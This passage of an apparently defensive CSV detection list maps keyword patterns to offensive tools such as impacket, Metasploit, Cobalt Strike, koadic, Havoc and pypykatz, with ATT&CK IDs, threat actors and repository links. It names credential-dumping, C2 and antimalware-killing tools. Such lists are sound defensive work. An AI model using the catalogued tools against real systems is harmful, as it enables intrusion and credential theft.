SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*impacketserviceinstall*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-services*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketsmbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-smbclient*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-smbserver*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-ticketer*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketutils*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-wmiexec*","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*impacket-wmiexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. 
The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ImpactDecoder*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ImpactPacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impersonate_token *Administrator*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" +"*impersonate_token *BUILTIN\Administrators*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ImpersonateAndUnload.cpp*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*ImpersonateLocalService*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*ImpersonateLoggedOnUser*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*impersonateprocess.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*impersonateuser.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*impersonateuser.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*imperva_gzip.py*","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. 
etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","146","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" +"*Implant*TeamServer.exe*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" +"*Implant.ImplantGenerator*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*implant.sleep-obf*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*implant/elevate/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/gather/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/inject/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/persist/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*implant/pivot/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*implant/sliver/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*Implant\SleepMask*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*implant-callback.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
+"*ImplantSSP.csproj*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - 
Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*import _eternalhush*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*import apypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*import BaseSprayModule*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
+"*import DCSYNC*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z"
+"*import DNSListener*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
+"*import 
EnablePersistence*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
+"*import eternalhush.*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*import IBurpExtender*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z"
+"*import impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*import ImpactDecoder*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*import ImpactPacket*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*import LdapSearchBofParser*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*import metame","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z"
+"*import mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming 
framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*import np_server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*import Payload*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*import pe.OBJExecutable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 
- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z"
